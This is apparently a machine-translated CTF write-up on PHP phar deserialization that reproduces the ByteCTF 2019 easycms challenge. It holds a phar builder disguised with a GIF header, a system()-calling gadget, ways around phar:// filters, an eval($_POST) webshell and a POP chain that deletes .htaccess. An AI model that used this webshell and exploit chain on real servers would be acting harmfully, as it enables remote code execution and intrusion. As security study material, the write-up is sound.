phar deserialization && reproduce bytectf_2019_easycms

0x01 Reference Links

In order to express my gratitude, first released most of the contents of the reference link
link

0x02 explain principle

nature phar is a compressed file, each of which is compressed file permissions, attributes and other information are placed in this section. This part will be stored as a sequence of user-defined meta-data, which is the core of the above-mentioned methods of attack place

according to the file structure of our own to build a pharfile, phpbuilt a Pharclass to handle related operations
Note: To use php.inithe phar.readonlyoption settings to Off, or can not generate phar file.

<?php
    class TestObject {
    			//魔法函数（文件包含phar文件时会反序列化）
    }
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub('GIF89a'.'<?php __HALT_COMPILER(); ?>'); //设置stub,添加GIF头，可以绕过图片格式检查
    $o = new TestObject();
    $o -> data='hu3sky';
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

The following functions will pharfile deserialization

Additional functions found

• exif
• exif_thumbnail
• exif_imagetype
• gd
• imageloadfont
• imagecreatefrom***
• hash
• hash_hmac_file
• hash_file
• hash_update_file
• md5_file
• sha1_file
• file / url
• get_meta_tags
• get_headers
• standard
• getimagesize
• getimagesizefromstringfinfo_file/finfo_buffer/mime_content_type

zip

$zip = new ZipArchive();
$res = $zip->open('c.zip');     //我们将phar压缩后，将压缩包的文件改为gif，此时仍然可以解压
$zip->extractTo('phar://test.phar/test');

zip

LOAD DATA LOCAL INFILEWill trigger this php_stream_open_wrapper. Let's test it

<?php
class A {
    public $s = '';
    public function __wakeup () {
        system($this->s);
    }
}
$m = mysqli_init();
mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);
$s = mysqli_real_connect($m, 'localhost', 'root', '123456', 'easyweb', 3306);
$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a  LINES TERMINATED BY \'\r\n\'  IGNORE 1 LINES;');

Re-allocationmysqld

[mysqld]
local-infile=1
secure_file_priv=""

Bypassing the phar: // limit head

0x01

$z = 'compress.bzip2://phar:///home/sx/test.phar/test.txt';
$z = 'compress.zlib://phar:///home/sx/test.phar/test.txt';
@file_get_contents($z);

0x02

@include('php://filter/read=convert.base64-encode/resource=phar://yunying.phar');
mime_content_type('php://filter/read=convert.base64-encode/resource=phar://yunying.phar')

0x03 reproducible bytectf_2019_easycms

Get accesswww.zip

• index.phpVerify landing page, you can log in to any account upload.phpupload page, but only adminaccount to upload files.
• Visited upload.php*, it will generate a sandbox in the .htaccessfile, reads:lolololol, i control all
• After uploading a file, it will return to the storage path to the file, view detailsyou can enter view.php, echoes file mimetype and file path.
• Because the directory .htaccessis written content, it can not be resolved, so access uploaded files will be reported 500
  
  
  

0x01 hash length to expand attacks (hashpump.py)

Objects are instantiated from a class of Admin. Follow Admin

Confirmed the attack to expand the hash length, the specific method of attack will not list them, Baidu click on the line.

0x02 Phar pop chain structure

Known long pass folder exists .htaccess, so we upload php horse can not be properly resolved, we find a way to delete the .htaccess.

Just try to upload a picture horse
there is a filter

there are two ideas attacks

• phar deserialization will upload_file upload to another directory, bypassing sanbox control in .htaccess
• Prior to upload a php horse, then PHP deserialize delete .htaccess file

Because we do not know the directory to store temporary files, you can only use the second approach.

We see view.php There is a Filecategory, follow-up Fileclass
above already mentioned, mime_content_type can be made starting phar serialization.
At the same time we note that there is a magic class Profile function __call
which has an open function, and admin, username, password control, so we have to find those open class method.
(ZipArchive，SessionHandler)
ZipArchive which can be utilized.
ZipArchive::open ( string $filename [, int $flags ] ) : mixed　　
With this overwritemethod, you can directly delete .htaccessfiles
attention here can also open a non-compressed files, such as.htaccess

We first upload a horse

<?php 
$a = "sys"."tem";
eval($_POST["xxx"]);
?>

Then construct `phar pop` attack chain

<?php
class File{

    public $filename;
    public $filepath;
    public $checker;
}
class Profile{

    public $username;
    public $password;
    public $admin;
}
$a=new File();
$a->checker=new Profile();
$a->checker->admin=new ZipArchive();
$a->checker->username="/var/www/html/sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/.htaccess";
$a->checker->password=ZipArchive::OVERWRITE;
$phar = new Phar('phar.phar');
$phar -> startBuffering();
$phar -> setStub('<?php __HALT_COMPILER();?>');
$phar -> addFromString('test.txt','test');
$phar -> setMetadata($a);
$phar -> stopBuffering();
?>

Cried, upload phar was filtered, `prompt you scares me`, winhex see a `` but after deleting may damage the phar structure would not work. Then replace php 7.0 is fully uploaded to solve the problem. We have to keep up with the trend of the times. Own meal storm hammer

By php://filterbypassing detection to trigger wafphar

view.php?filename=9c7f4a2fbf2dd3dfb7051727a644d99f.phar&filepath=php://filter/resource=phar://sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/9c7f4a2fbf2dd3dfb7051727a644d99f.phar

Successfully deleted.htaccess